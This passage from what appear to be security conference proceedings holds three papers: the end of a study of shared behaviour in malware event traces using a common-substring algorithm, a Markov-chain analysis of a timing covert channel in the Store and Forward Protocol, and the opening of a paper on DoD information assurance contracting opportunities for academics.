traces are encoded in the Malware Instruction Set (MIST) format and are in sequential order.
Furthermore, the traces are separated by thread behaviors of the executable.<br />
3.2 MIST<br />
The dynamic trace of the malware instances in the dataset are logs of the events that occurred as the<br />
result of the execution of the malware binary. The logs contain details about each event that may be<br />
of different levels of interest to an analyst or to analysis software. MIST encodes events in a format that prioritizes log details, e.g., filenames, sleep delay times and memory addresses associated
with each event trace. In total there are 120 system calls that fall into 13 more general categories<br />
(e.g., winsock_op, file_open system calls are both in the winsock category). An extensive description<br />
and examples of MIST are presented in (Trinius et al., 2010).<br />
4. The common substrings algorithm<br />
The algorithm developed to identify shared behaviors in malware instance event traces is a modified<br />
version of the well-known longest common substring algorithm (Cormen et al., 2001). The main<br />
difference is that in the modified version, all common substrings of a minimum length are identified,<br />
instead of only the longest.<br />
There are two main procedures that are executed to find the amount of shared behavior in the<br />
malware instances. Figure 1 is the reduction procedure that calculates the amount of common<br />
behavior in the event traces. In line 2, all common substrings are stored in the commonSubstrings<br />
variable. In order to efficiently process the files, this step was first run on instances that were labeled<br />
in the same malware class, i.e., all event traces within the ALLAPLE malware instances (as assigned<br />
by anti-virus software) were compared first, then all EJIK traces, etc.<br />
In lines 3-4, the commonSubstrings are sorted in descending order and output to a file. This allows the commonSubstrings to be used to find commonality with other datasets. In lines 5-9, the
occurrences of all strings in commonSubstrings of at least size min are identified in the largeFileSet.<br />
They are then counted and removed. Removing the occurrences in the largeFileSet allows calculating<br />
the amount of common behavior that exists in these malware instances (line 10).<br />
Figure 1: The reduction procedure<br />
The CommonSubstring procedure (Figure 2) starts by reading the event traces from two input files<br />
(lines 1-5). In the case that the next event sequences match in the two files, a temporary string,<br />
currSubstring, keeps track of the matching sequences (lines 12-24). When the event sequence is dissimilar in the two files, the current common substring, currSubstring, is stored if it is unique (lines 8-10) and finally cleared (line 11). For this research, a hash table was used to ensure that only unique instances are stored. Lastly, all common substrings found are returned to the calling procedure in line 25.
Figure 2: The CommonSubstring procedure<br />
In practice, because the malware instances share a high amount of common behavior, the storage space required to save the unique common substrings is small (less than 50 MB when storing substrings of length 2 or greater).
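Figures 1 and 2 appear only as images in the proceedings. The following is a rough, self-contained Python sketch of the two procedures as described in the text above; the function names, the list-of-event-names trace representation, and the maximal-run check are choices made for this sketch, not the paper's original code.

```python
def common_substrings(trace_a, trace_b, min_len):
    """Modified longest-common-substring step (cf. Figure 2): collect ALL
    common substrings of at least min_len events, not only the longest.
    Traces are sequences of event names; a set (hash table) keeps the
    stored substrings unique, as described in the text."""
    found = set()
    for i in range(len(trace_a)):
        for j in range(len(trace_b)):
            # skip starts that are inside a longer match found earlier
            if i > 0 and j > 0 and trace_a[i - 1] == trace_b[j - 1]:
                continue
            k = 0
            while (i + k < len(trace_a) and j + k < len(trace_b)
                   and trace_a[i + k] == trace_b[j + k]):
                k += 1
            if k >= min_len:
                found.add(tuple(trace_a[i:i + k]))
    return found


def reduction(small_set, large_set, min_len):
    """Reduction procedure (cf. Figure 1): gather the common substrings
    of the small set, sort them in descending order of length, then count
    and remove their occurrences in the large set, returning the fraction
    of large-set events accounted for."""
    from itertools import combinations
    common = set()
    for a, b in combinations(small_set, 2):
        common |= common_substrings(a, b, min_len)
    ordered = sorted(common, key=len, reverse=True)  # longest matched first
    total = removed = 0
    for trace in large_set:
        total += len(trace)
        events = list(trace)
        for sub in ordered:
            n = len(sub)
            i = 0
            while i + n <= len(events):
                if tuple(events[i:i + n]) == sub:
                    del events[i:i + n]  # remove the occurrence
                    removed += n
                else:
                    i += 1
    return removed / total if total else 0.0
```

For example, two small traces sharing the run a,b,c yield that run as a common substring, and a large trace containing it twice is 75% accounted for once both occurrences are removed.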
5. Experimental setup<br />
In order to determine whether common behavior exists in the malware instances, the Reference<br />
dataset was separated into two sets: small and large. The small set contained 2071 instances of malware that are less than 100 KB in size. The large set contained 1060 instances of malware that are between 100 KB and 3.4 MB in size. For this research, only the malware size, not the type assigned by an anti-virus scanner, was used when separating the dataset. For the most part, the malware types for the small and large sets are different. Table 1 shows more details on the dataset and how it was partitioned.
Table 1: Details on small and large sets<br />
Small Set Large Set<br />
Total # event trace files 2,071 1,060<br />
Total # events 1,217,985 17,400,262<br />
Total size of event trace files 44 MB 490 MB<br />
The smaller dataset was used for capturing the set of common substrings in the hope that large, complex malware instances may be broken down into behaviors that exist in small malware. For example, it may be the case that part of a malware instance exhibits the behavior of a trojan to collect data and also self-replicates like a worm.
The level of detail needed when finding common behavior among malware instances was based on<br />
Rieck et al.’s (2010) work. In their experiment, they found that the best configuration for clustering<br />
malware instances was realized when using MIST level 1. This means that only the event names, not<br />
any other details such as parameters, from the traces were used when searching for common<br />
behaviors. Although their method compared fixed-size event q-grams, the methods in this experiment are similar; therefore MIST level 1 was used.
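As a toy illustration of what restricting the traces to MIST level 1 means, the event names are kept and all other details are dropped. The event names and parameter structure below are invented for illustration, not actual CWSandbox output.

```python
# Hypothetical full trace: (event name, parameters) pairs
trace = [("load_dll", {"file": "kernel32.dll"}),
         ("open_file", {"name": "C:\\sample.txt"}),
         ("sleep", {"ms": 500})]

# MIST level 1: discard the parameters and keep only the event names
level1 = [name for name, _params in trace]
print(level1)  # ['load_dll', 'open_file', 'sleep']
```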
The Reduction algorithm presented in Figure 1 was first run on the small set. In order to more<br />
efficiently process the data, the input was split into four equal size chunks and was processed<br />
concurrently on four computers. After the common substrings from the small set were captured, the<br />
next step was to determine the common behavior that occurs in the large file set.<br />
6. Results<br />
The results show that there is much common behavior among the malware instances. From an<br />
analyst’s point of view, the preferred case is that longer substrings are prevalent among the malware<br />
because these longer substrings most likely capture more semantically rich behavior blocks. If the substrings are all too short, the benefit would be small because it would take almost the same amount of effort to analyze the event traces.
In order to help investigate what is actually happening in the data, the experiment was run several<br />
times using different allowable minimum lengths to identify common substrings. For example, if the<br />
allowed minimum length is six event sequences, all common substrings less than size six are ignored<br />
and are not removed from the large set. Therefore, the reduction percentage, in this example, would<br />
only be based on substrings size six and greater. Figure 3 shows the results for minimum lengths<br />
ranging from 2 to 100.<br />
The graph shows that when only considering substrings of length at least 12, half of the large dataset<br />
can be accounted for using the common substrings in the small set. This indicates that by starting on<br />
small traces, an analyst can break down a large complex trace by removing common behaviors.<br />
When using a minimum length of 24, the restriction seems too great; only 30% of the large set is accounted for. However, this also signifies that the dataset represents a reasonable distribution of dissimilar malware. If the malware all showed a high level of similar behavior with many long sequences, it could be the case that the collected malware is not a good representation of different types of malware. For example, when looking at some of the longest common substrings found within the small set, it was sometimes the case that two malware instances differed only by a few events. Further investigation revealed that these two malware instances were of the same type and differed only slightly, probably to confuse a hash-based virus scanner.
When using a minimum size of two, 96% of the large dataset is accounted for, but this is not practical<br />
because most of the shared sequences are short. This is evident because the percentage of shared<br />
behavior drops as the sequence minimum increases.<br />
Figure 3: Average percentage of the large set that is accounted for by common substrings of the<br />
small set<br />
7. Conclusions and future work<br />
This paper has provided a technique that can be used for similarity analysis on malware, based on dynamic behavior captured using CWSandbox. The results show that the similarities are not restricted to short sequences; many long sequences are shared among the malware instances, which means that there are in fact many shared behaviors present that could be identified and possibly labeled using natural language to reduce an analyst's workload, matching the intentions of Kirillov et al. (2010).
Future work will test the methods described in this paper with a larger dataset. In addition, instead of<br />
limiting the process to sequential instructions, it may be useful to instead identify templates of<br />
behavior, as Christodorescu et al. (2005) did for static malware analysis. For example, there may be a<br />
trace that contains a sequence of five wait events and another with ten. Semantically, these are<br />
almost equivalent, but the common substring algorithm presented here does not capture this; a<br />
template method could. Tailoring some techniques used in identifying code clones, such as in (Roy and Cordy, 2007), to malware may also prove useful.
The work described here is an initial step toward a tool that can be used to semantically label portions of files to allow for more efficient identification of both redundancy (use of legitimate 3rd-party libraries) and overlap (reuse of malware code) in malware instances.
Acknowledgments<br />
I would like to thank Victor Mena, Ken Fabela, and Michael Shaughnessy for their valuable comments<br />
and suggestions that led to the maturation of this work. Also, I would like to thank Konrad Rieck and<br />
colleagues for the dataset and feedback.<br />
References<br />
Baecher, P., Koetter, M., Holz, T., Dornseif, M. and Freiling, F. (2006) “The Nepenthes platform: An efficient<br />
approach to collect malware”, Recent Advances in Intrusion Detection, No. 4219, pp 165–184.<br />
Bayer, U., Comparetti, P.M., Hlauschek, C., Kruegel, C. and Kirda, E. (2009) “Scalable, behavior-based malware<br />
clustering”, Network and Distributed System Security Symposium (NDSS).<br />
Bayer, U., Moser, A., Krügel, C. and Kirda, E. (2006) “Dynamic analysis of malicious code”, Journal in Computer<br />
Virology, Vol. 2, No. 1, pp 67–77.<br />
Christodorescu, M., Jha, S., Seshia, S. A., Song, D. and Bryant, R.E. (2005) “Semantics-Aware Malware<br />
Detection”, IEEE Symposium on Security and Privacy, pp 32–46.<br />
Cormen, T.H., Leiserson, C.E., Rivest, R.L., Stein, C. (2001) Introduction to Algorithms, The MIT press.<br />
Cornelissen, B. (2009) “Evaluating Dynamic Analysis Techniques for Program Comprehension”, Delft University<br />
of Technology.<br />
Göbel, J. G. (2009) “Amun: Python honeypot”, http://amunhoney.sourceforge.net.<br />
Han, S., Lee, K. and Lee, S. (2010) "Packed PE File Detection for Malware Forensics", Second International Conference on Computer Science and its Applications (CSA), pp 1–7.
Jang, J. and Brumley, D. (2009) “BitShred: Fast, Scalable Code Reuse Detection in Binary Code”, CMU-CyLab,<br />
pp 28–37.<br />
Kasina, A., Suthar, A. and Kumar, R. (2010) “Detection of Polymorphic Viruses in Windows Executables”,<br />
Contemporary Computing, pp 120–130.<br />
Kirillov, I., Beck, D., Chase, P., and Martin, R. (2010) “Malware Attribute Enumeration and Characterization”,<br />
http://maec.mitre.org/.<br />
Lee, J., Jeong, K., and Lee, H. (2010) “Detecting metamorphic malwares using code graphs”, ACM Symposium<br />
on Applied Computing, pp 1970–1977.<br />
Norman Solutions (2003), “Norman sandbox whitepaper”<br />
http://download.norman.no/whitepapers/whitepaper_Norman_SandBox.pdf<br />
Provos, N. (2004) “A virtual honeypot framework”, USENIX Security Symposium, Vol. 13, pg 1.<br />
Rieck, K., Trinius, P., Willems, C. and Holz, T. (2010) "Automatic Analysis of Malware Behavior using Machine Learning", Journal of Computer Security (JCS), to appear.
Roy, C.K. and Cordy, J.R. (2007) “A survey on software clone detection research”, Queen’s School of Computing<br />
TR, Vol. 541, pg 115.<br />
Sharif, M., Lanzi, A., Giffin, J. and Lee, W. (2009) “Automatic reverse engineering of malware emulators”, IEEE<br />
Symposium on Security and Privacy, pp 94–109.<br />
Trinius, P., Willems, C., Holz, T. and Rieck, K. (2010) “A Malware Instruction Set for Behavior-based Analysis”,<br />
Sicherheit 2010, pp 205–216.<br />
Vinod, P., Jaipur, R., Laxmi, V. and Gaur, M.S. (2009) “Survey on malware detection methods”, Hack, pg 74.<br />
Willems, C., Holz, T., Freiling, F. (2007) “Toward automated dynamic malware analysis using CWSandbox”, IEEE<br />
Security and Privacy, Vol. 5, No. 2, pp 32–39.<br />
Ye, Y., Wang, D., Li, T., Ye, D. and Jiang, Q. (2007) “An intelligent PE-malware detection system based on<br />
association mining”, Journal in computer virology, Vol. 4, No. 4, pp 323–334.<br />
Modeling and Justification of the Store and Forward<br />
Protocol: Covert Channel Analysis<br />
Hind Al Falasi and Liren Zhang<br />
United Arab Emirates University, Al Ain, United Arab Emirates<br />
hindalfalasi@uaeu.ac.ae<br />
lzhang@uaeu.ac.ae<br />
Abstract: In an environment where two networks with different security levels are allowed to communicate, a<br />
covert channel is created. The paper aims at calculating the probability of establishing a covert channel between<br />
the high security network and the low security network using a Markov chain model. The communication between
the networks follows the Bell-LaPadula (BLP) security model. The BLP model is a “No read up, No write down”<br />
model where up indicates an entity with a high security level and down indicates an entity with a low security<br />
level. In networking, the only way to enforce the BLP model is to divide a network into separate entities, networks<br />
with a low security level, and others with a high security level. This paper discusses our analysis of the Store and<br />
Forward Protocol that enforces the BLP security model. The Store and Forward Protocol (SAFP) is a gateway<br />
that forwards all data from a low security network to a high security network, and it sends acknowledgments to<br />
the low security network as if they were sent from the high security network; thereby achieving reliability of the<br />
communication in this secure environment. A timing covert channel can be established between the two networks<br />
by using the times of the acknowledgments to signal a message from the high security network to the low<br />
security network. A high security network may send acknowledgments immediately or with some delay where the<br />
time of the acknowledgment's arrival is used to convey the message. The covert channel probability is found to be equal to the blocking probability of the SAFP buffer when the problem is analyzed using a Markov chain model.
Increasing the size of the buffer at the SAFP decreases the covert channel probability. Carefully determining the<br />
size of the buffer of the SAFP ensures minimizing the covert channel probability.<br />
Keywords: covert channel, access model, Markov Chain Model, store and forward protocol<br />
1. Introduction<br />
Covert channels may be introduced to secure networks both intentionally and unintentionally.<br />
Consider a computer system where two networks with different security levels are communicating; the
existence of covert channels can compromise the efforts exerted to prevent access to higher security<br />
level information by a lower security level network. Security procedures should be established to<br />
prevent the lower network from reading the higher network files, and ensure that the higher network<br />
cannot write to the lower network files. We are referring to a multilevel secure setting where different<br />
networks have different security levels. The notion of having rules that state “No read up", and "No<br />
write down” is in accordance with the BLP security model (Bell and LaPadula 1973). The model's<br />
security procedures make it mandatory for information to flow from the low security network to the<br />
high security network only.<br />
In this paper we are interested in one type of covert channel, a timing channel. In timing channels,<br />
information is transmitted by the timings of events (Wray 1991). This channel is established whenever<br />
the higher network is able to hold up the SAFP (Kang and Moskowitz 1995) response time to signal<br />
an input to the lower network. An acknowledgement sent by the SAFP to the lower network without<br />
delay means no message; however, if the acknowledgment is sent with delay, the value of the delay<br />
is translated by the lower network as an alphabet. Therefore, a communication channel is established<br />
between the two networks, with the output constructed from the different delay time values. In our case, the medium in which the covert channel exists is the network environment, i.e., it is a network covert channel (Cabuk et al., 2009). The channel controls the timing of legitimate network traffic to allow the leaking of confidential data. The purpose of the covert channel analysis is to
calculate the best size buffer for the SAFP to minimize the probability of the covert channel<br />
establishment.<br />
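The abstract states that the covert channel probability equals the blocking probability of the SAFP buffer and decreases as the buffer grows. As a rough numerical sketch of that relationship, one can compute the blocking probability of a single-server finite queue (M/M/1/K); note this specific queueing model is an assumption made here for illustration and may differ in detail from the Markov chain developed in the analysis.

```python
def mm1k_blocking(lam, mu, K):
    """Blocking probability of an M/M/1/K queue with arrival rate lam,
    service rate mu, and room for K packets in the system:
    P_block = (1 - rho) * rho**K / (1 - rho**(K+1)) for rho != 1."""
    rho = lam / mu
    if rho == 1.0:
        return 1.0 / (K + 1)
    return (1 - rho) * rho ** K / (1 - rho ** (K + 1))

# A larger buffer K lowers the blocking -- and hence covert channel --
# probability when the queue is stable (rho < 1)
print(mm1k_blocking(1.0, 2.0, 4) > mm1k_blocking(1.0, 2.0, 8))  # True
```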
2. Background and motivation<br />
Information flow between two networks with different security levels should not be governed solely by the rules of the BLP security model. An integral part of implementing the BLP security model is
ensuring that any weaknesses of the system implementing the model do not defeat the purpose<br />
behind it. Being able to identify the circumstances that lead to establishing a covert channel between<br />
the two communicating networks is the first step towards eliminating the covert channel. The<br />
importance of identifying the existence of covert channels stems from the fact that they are used to<br />
transfer information secretly, where the ultimate goal of covert channels is to conceal the very<br />
existence of the communication (Zander et al., 2007).<br />
The capacity of the covert channel was analyzed as a function of buffer size and moving average size<br />
by Kang and Moskowitz (Kang and Moskowitz, 1993; 1995). The analysis was performed on a Pump<br />
that used randomized acknowledgments which are also used to control the input rate of a source. In<br />
addition, several protocols were reviewed and implemented (Kang and Moskowitz, 1993), and the<br />
proposed protocols in their work were designed to reduce the bandwidth of covert channels.<br />
3. Store and Forward Protocol (SAFP)<br />
The Store and Forward protocol is a simple protocol used for reliable communication between two<br />
networks. The protocol's effectiveness in minimizing the existence of covert channels is limited. However, we use it in this paper as a benchmark for calculating the probability of a timing covert channel, as the protocol's advantage is its simplicity to analyze.
The idea behind this protocol is simple: There are two networks communicating, one network has a<br />
low security level, and the other has a high security level. There is a gateway between the two<br />
networks. The gateway does the following job: it receives a packet from the low security network,<br />
stores it in a buffer, and then sends an acknowledgment to the low security network indicating the<br />
successful receipt of that packet. The gateway then forwards the packet to the high security network<br />
and waits for an acknowledgment of receipt. If no such acknowledgment is received, the gateway<br />
retransmits the packet to the high security network. Only after the receipt of the acknowledgment<br />
does the gateway delete that packet from its buffer.<br />
All traffic from the high security network is ignored except for the acknowledgments. This notion is in<br />
accordance with the BLP security model which is a “No read up, No write down” model where up<br />
indicates an entity with high security level and down indicates an entity with low security level. The<br />
gateway forwards all data from the low security network to the high security network, and it does not<br />
forward acknowledgments from the high security network to the low security network; however, it<br />
achieves reliability of the communication by sending acknowledgments to the low security network<br />
(Figure 1).<br />
Figure 1: Store and Forward Protocol (SAFP)<br />
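The gateway's job described above can be sketched as a toy loop. This is a minimal sketch only: the function name, the ACK callback, and the single-pass control flow (no actual retransmission timer) are simplifications introduced here, not part of the protocol's specification.

```python
from collections import deque

def safp_gateway(low_packets, high_ack, buffer_size):
    """Toy model of the SAFP gateway: store each low-side packet, ACK it
    to the LSN on the HSN's behalf, forward it, and delete it from the
    buffer only once the HSN acknowledges; packets arriving to a full
    buffer are blocked."""
    buffer = deque()
    acks_to_lsn, delivered, blocked = [], [], []
    for pkt in low_packets:
        if len(buffer) >= buffer_size:
            blocked.append(pkt)      # buffer full: packet cannot be stored
            continue
        buffer.append(pkt)           # store the packet
        acks_to_lsn.append(pkt)      # ACK sent to the LSN on receipt
        if high_ack(pkt):            # forward to HSN; did the HSN ACK?
            buffer.remove(pkt)       # delete only after the HSN's ACK
            delivered.append(pkt)
        # otherwise the packet stays buffered, awaiting retransmission
    return acks_to_lsn, delivered, blocked
```

With a buffer of size 1 and an HSN that never acknowledges packet 2, packet 2 occupies the buffer and packet 3 is blocked, illustrating how the buffer's occupancy governs blocking.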
3.1 The covert channel<br />
The problem with the store and forward protocol is that it permits covert channels to exist between the<br />
high security network and the low security network through the acknowledgments. A timing covert<br />
channel can be established between the two networks by using the time values of the<br />
acknowledgments to signal a message from the high security network to the low security network. A<br />
high security network may send acknowledgments immediately or with some delay where the value of<br />
the delay is used to convey the message.<br />
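Such a channel can be sketched directly, assuming the high security network chooses between a short and a long acknowledgment delay for each covert bit. The threshold and delay values here are illustrative assumptions, not taken from the paper:

```python
THRESHOLD = 0.5  # seconds; receiver's decision boundary (illustrative)

def encode(bits, short_delay=0.1, long_delay=1.0):
    """High side: leak one bit per acknowledgment via its delay."""
    return [long_delay if b else short_delay for b in bits]

def decode(delays, threshold=THRESHOLD):
    """Low side: recover the bits by thresholding the observed delays."""
    return [1 if d >= threshold else 0 for d in delays]

message = [1, 0, 1, 1, 0]
delays = encode(message)           # delays the HSN applies to its acks
assert decode(delays) == message   # the LSN recovers the covert message
```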
3.2 TCP sliding window effect<br />
The SAFP notifies the low security network of the number of bytes it is willing to receive, which then<br />
becomes the low security network's send window. On the other side, the high security network notifies<br />
the SAFP of the number of bytes it is willing to receive, which then becomes the SAFP's send window.<br />
At first glance, the use of TCP's sliding window appears to reduce the probability of the covert channel<br />
by minimizing the number of acknowledgments. The low security network can send several packets<br />
without waiting for acknowledgments. Similarly, the high security network can acknowledge several<br />
Hind Al Falasi and Liren Zhang<br />
packets at once. Therefore, for every sequence of packets sent, only one piece of useful information<br />
is sent via one acknowledgment. However, the high security network can set the size of the sliding<br />
window to one, which requires every packet to be acknowledged before the next one is sent, taking<br />
us back to square one.<br />
4. The covert channel analysis<br />
4.1 Notations<br />
The following acronyms are used in the paper: LSN stands for Low Security Network, and HSN<br />
stands for High Security Network.<br />
Table 1: Notation used throughout the paper and in the illustration figures<br />
Arrival rate (λ): LSN→SAFP λ1; SAFP→HSN λ2<br />
Service rate (µ): SAFP→LSN µ1; HSN→SAFP µ2<br />
Transmission delay (Tx): LSN→SAFP T1; SAFP→HSN T2<br />
Propagation delay (α): LSN→SAFP α1; SAFP→HSN α2<br />
Acknowledgement rate (Ack/sec): SAFP→LSN RL; HSN→SAFP RH<br />
Packet size: Ri<br />
Queuing delay: q<br />
4.2 Assumptions<br />
The transmission delays T1 and T2 of the acknowledgment packets are ignored because the packets<br />
are small. In addition, the processing (service) time at the SAFP is negligible.<br />
4.3 Discussion<br />
In this section, we investigate the time it takes one packet to travel from the low security network to<br />
the high security network, the time it takes an acknowledgement of that packet to reach the SAFP,<br />
and the time an acknowledgment from the SAFP takes to reach the low security network. From the<br />
SAFP's point of view, the i-th packet is received at α1 + T1. Moreover, the i-th packet is deleted from<br />
the buffer at α1 + T1 + 2α2 + T2 + 1/µ2,<br />
where α1 represents the propagation delay of the packets sent between the low security network and<br />
the SAFP. Similarly, α2 represents the propagation delay of the packets sent between the SAFP and<br />
the high security network. T1 and T2 represent the transmission delay from the low security network to<br />
the SAFP, and the SAFP and the high security network, respectively. Finally, 1/ µ2 is the service time<br />
at the high security network.<br />
When we take the distance between the SAFP gateway and the high security network into<br />
consideration, the time a packet stays in the SAFP buffer changes. For example, if the distance is<br />
very large, then we can ignore T2 and 1/µ2, so the i-th packet is deleted from the buffer at α1 + T1 +<br />
2α2. As a result, the ability of the high security network to control the acknowledgment rates, and<br />
thereby create a covert channel, diminishes: the service time at the high security network is the only<br />
factor under its control, while the other terms are determined by the physical environment of the<br />
network. On the other hand, if the distance between them is small, we estimate that the i-th packet is<br />
deleted from the buffer at α1 + T1 + T2 + 1/µ2.<br />
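The two buffer residency expressions above can be checked numerically. The helper names and parameter values below are illustrative assumptions, not measurements from the paper:

```python
def receive_time(alpha1, T1):
    """Time (SAFP's view) at which the i-th packet arrives: alpha1 + T1."""
    return alpha1 + T1

def delete_time(alpha1, T1, alpha2, T2, mu2):
    """Time at which the packet is deleted from the buffer: arrival time
    plus the round trip to the HSN (2*alpha2 + T2) plus the HSN service
    time 1/mu2."""
    return alpha1 + T1 + 2 * alpha2 + T2 + 1 / mu2

# Illustrative values: delays in seconds, mu2 in packets per second.
alpha1, T1, alpha2, T2, mu2 = 0.01, 0.002, 0.05, 0.002, 100.0
print(round(receive_time(alpha1, T1), 6))                  # 0.012
print(round(delete_time(alpha1, T1, alpha2, T2, mu2), 6))  # 0.124
```

With these values the 2α2 round-trip term dominates, matching the observation that a large SAFP-to-HSN distance leaves little for the high security network to manipulate.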
Another element to consider is the high security network service time, which affects the SAFP<br />
queuing time. We are considering this element because it leads to the establishment of a timing<br />
covert channel between the high security network and the low security network. A slow service time<br />
eventually leads to a full buffer at the SAFP. In other words, packets from the low security network are<br />
lost; therefore, no acknowledgments are sent from the SAFP to the low security network. From there,<br />
the high security network can control the SAFP buffer; subsequently, it can control the rate of the<br />
acknowledgments from the SAFP to the low security network. Therefore, it can use the delays to<br />
signal messages to the low security network. The SAFP buffer is modeled as an M/M/1/K queue,<br />
since it has finite capacity: the maximum number of packets in the buffer is K. A packet enters the<br />
queue if it finds fewer than K packets in the buffer and is lost otherwise. The probability of a full buffer<br />
equals the blocking probability, which we take to be the probability of a covert channel. An illustration<br />
of the above scenario is presented in Figure 2.<br />
presented in Figure 2.<br />
Figure 2: Communication representation between low security network, SAFP and high security<br />
network<br />
5. Analysis of the system using Markov chain model<br />
Using the state transition diagram (see Figure 3), we found the blocking probability of the SAFP buffer<br />
(PK):<br />
Solving the equations in terms of P0:<br />
p1 = (λ1/µ2) p0<br />
p2 = (λ1/µ2)^2 p0<br />
pk = (λ1/µ2)^k p0, for 1 ≤ k ≤ K (1)<br />
Σ (k=0 to K) pk = Σ (k=0 to K) (λ1/µ2)^k p0 = 1 (2)<br />
PK = (λ1/µ2)^K p0 (3)<br />
Solving for PK:<br />
p0 = 1 / [Σ (k=0 to K) (λ1/µ2)^k] = (1 − λ1/µ2) / (1 − (λ1/µ2)^(K+1)) (4)<br />
PK = (λ1/µ2)^K (1 − λ1/µ2) / (1 − (λ1/µ2)^(K+1)) (5)<br />
*Where PK = PB = the probability that an arriving packet is turned away due to a full buffer = the<br />
probability of a covert channel.<br />
Figure 3: Markov chain model of the SAFP queue<br />
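The M/M/1/K blocking probability, PK = ρ^K (1 − ρ) / (1 − ρ^(K+1)) with ρ = λ1/µ2, can be evaluated directly. This sketch reproduces the Section 6 scenario, where the arrival rate is twice the service rate (ρ = 2):

```python
def blocking_probability(rho, K):
    """M/M/1/K blocking probability P_K for offered load rho = lambda/mu."""
    if rho == 1.0:
        return 1.0 / (K + 1)  # limiting case: all K+1 states equally likely
    return rho**K * (1 - rho) / (1 - rho**(K + 1))

# Arrival rate twice the service rate, as in the Results section:
for K in (0, 2, 5, 10, 20):
    print(K, blocking_probability(2.0, K))
# P_K starts at 1 for K = 0 and settles just above 0.5 as K grows.
```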
6. Results<br />
Figure 4 provides an overview of the relationship between the blocking probability and the size of the<br />
SAFP buffer. We assume the simplest possible scenario, where the arrival rate is twice the service<br />
rate. With a buffer of size 0, the blocking probability is 1.<br />
Figure 4: PK vs. K<br />
This is understandable, as at this point the SAFP turns away every packet for lack of storage space.<br />
When the size of the buffer is 2, the calculated probability of a covert channel is more than 50%.<br />
While the probability decreases slightly as we increase the size of the buffer, we find that<br />
the value stabilizes near 0.5, where further changes in the blocking probability are negligible. Once<br />
the buffer size exceeds 10, for every packet serviced one packet is blocked: as long as the arrival rate<br />
is twice the service rate, whenever a packet from the buffer is accepted for service, room is made for<br />
exactly one new packet to enter the buffer. This explains the 0.5 blocking probability. The blocking<br />
probability decreases as the buffer size increases because fewer packets are turned away due to a<br />
full buffer. When a packet enters the SAFP queue, an acknowledgment of receipt is sent from the<br />
SAFP to the low security network, which means there is no delay that can be interpreted as a<br />
message from the high security network. If we desire a blocking probability of 0.5, then we need a<br />
buffer capable of holding at least 10 packets.<br />
7. Conclusion<br />
We examined the SAFP protocol, which is used to provide reliability of communication between two<br />
networks with different security levels. We argued that a timing covert channel can exist between the<br />
two networks, given the possibility that malicious users are able to control the acknowledgments'<br />
arrival times. We analyzed the timing of the packets flowing between the two networks and the SAFP,<br />
and the probability of the covert channel between the low security and high security networks. The<br />
purpose of our covert channel analysis was to calculate the best buffer size for the SAFP to keep the<br />
probability of the covert channel to a minimum, which we found depends on the arrival rate of LSN<br />
packets and the service rate at the HSN. We created a mathematical model to calculate the covert<br />
channel probability and to identify the factors that increase or decrease it.<br />
One of our future plans includes building a mathematical model for a Data Pump (Kang and<br />
Moskowitz, 1993; 1995).<br />
References<br />
Bell, D. and LaPadula, L. (1973) Secure Computer Systems: Mathematical Foundations. ESD-TR-73-278, Vol. 1,<br />
Mitre Corp.<br />
Bolch, G., Greiner, S., DeMeer, H. and Trivedi, K.S. (2006) Queueing Networks and Markov Chains: Modeling<br />
and Performance Evaluation with Computer Science Applications. Second Edition, Wiley Interscience,<br />
Hoboken, NJ.<br />
Cabuk, S., Brodley, C. and Shields, C. (2009) IP Covert Channel Detection. ACM Transactions on Information<br />
and System Security, Vol. 12, Issue 4 (Apr. 2009), pp. 129.<br />
Kang, M. and Moskowitz, I. (1995) A Data Pump for Communication. NRL Memo Report 5540-95-7771.<br />
Kang, M. and Moskowitz, I. (1993) A Pump for Rapid, Reliable, Secure Communication. Proceedings of the ACM<br />
Conference on Computer and Communications Security '93, Fairfax, VA, pp. 119-129.<br />
Ogurtsov, N., Orman, H., Schroeppel, R., O'Malley, S. and Spatscheck, O. (1996) Covert Channel Elimination<br />
Protocols. Technical Report TR96-14, Department of Computer Science, University of Arizona.<br />
Wray, J.C. (1991) An Analysis of Covert Timing Channels. Proceedings of the IEEE Symposium on Research in<br />
Security and Privacy, pp. 2-7.<br />
Zander, S., Armitage, G. and Branch, P. (2007) Covert Channels and Countermeasures in Computer Network<br />
Protocols. IEEE Communications Magazine, Vol. 45, pp. 136-142.<br />
The Evolution of Information Assurance (IA) and<br />
Information Operations (IO) Contracts across the DoD:<br />
Growth Opportunities for <strong>Academic</strong> Research – an Update<br />
Edwin Leigh Armistead 1 and Thomas Murphy 2<br />
1 Goldbelt Hawk LLC and Norwich University, USA<br />
2 NorthLight Technologies, USA<br />
larmistead@gbhawk.com<br />
earmiste@norwich.edu<br />
tmurphy@rochester.rr.com<br />
Abstract: Four years ago, the authors presented a paper at the ICIW conference in Monterey, CA (Armistead &<br />
Murphy, 2007) that outlined opportunities for academics and researchers with regard to IO (Information<br />
Operations), IW (Information Warfare) and IA (Information Assurance) contracts across the Department of<br />
Defense (DoD) and Federal government (USG). The original paper highlighted the differential between the<br />
contracts available and the opportunities current at that time. Specifically, that paper predicted what the future<br />
might hold for<br />
further growth in these areas and how growth of IO, IA and IW contract vehicles can benefit universities and<br />
academics from a funding aspect. Finally, the original paper also suggested future areas of research that<br />
academics may be interested in exploring, to best optimize their ability to secure grants and contracts over the<br />
next few years. This paper is not only an update to the original research, to review the original hypothesis and<br />
determine if the predictions from four years ago were correct, but it also mines new data sources to take a fresh<br />
look at current contracts. In this research, the authors analyze the growing new opportunities in cyber warfare,<br />
strategic communications, psychological operations and cyber security. The scope of IO / IA is also expanding<br />
farther into areas of diplomacy, economics, and homeland security, while growing even more central to complex<br />
unconventional and conventional warfare applications. In addition, organizational change is accompanying these<br />
doctrinal and application area changes, which has led to a subsequent revision of the contract opportunities<br />
available. Likewise, new revisions of policy and documentation are also expected to arrive in the foreseeable<br />
future, which could lead to a deeper understanding and appreciation of cultural values and psychological roles<br />
among the multiple political players. In this review, we explore what new and promising opportunities for<br />
collaboration exist for academics, and we hope that this paper can alert researchers to alternate opportunities for<br />
funding in the IO and IA arena that they may not have considered previously.<br />
Keywords: information assurance, information operations, Department of Defense, contracts, proposals<br />
1. Introduction<br />
For many academics, funding is a constant pursuit. With the current recession, grants and<br />
other non-profit opportunities may have become more limited than in previous years. In this era<br />
of fiscal constraint, this paper examines another method of obtaining funds for academics that should<br />
be considered. Specifically, the authors are interested in the opportunities that lay within the realm of<br />
DoD and Federal contracting, where academics can act as consultants to the companies that are<br />
supporting these entities. In some cases, this can be quite a lucrative venture, and it offers other<br />
avenues besides grants and academic scholarships to offset the financial needs of the tenured<br />
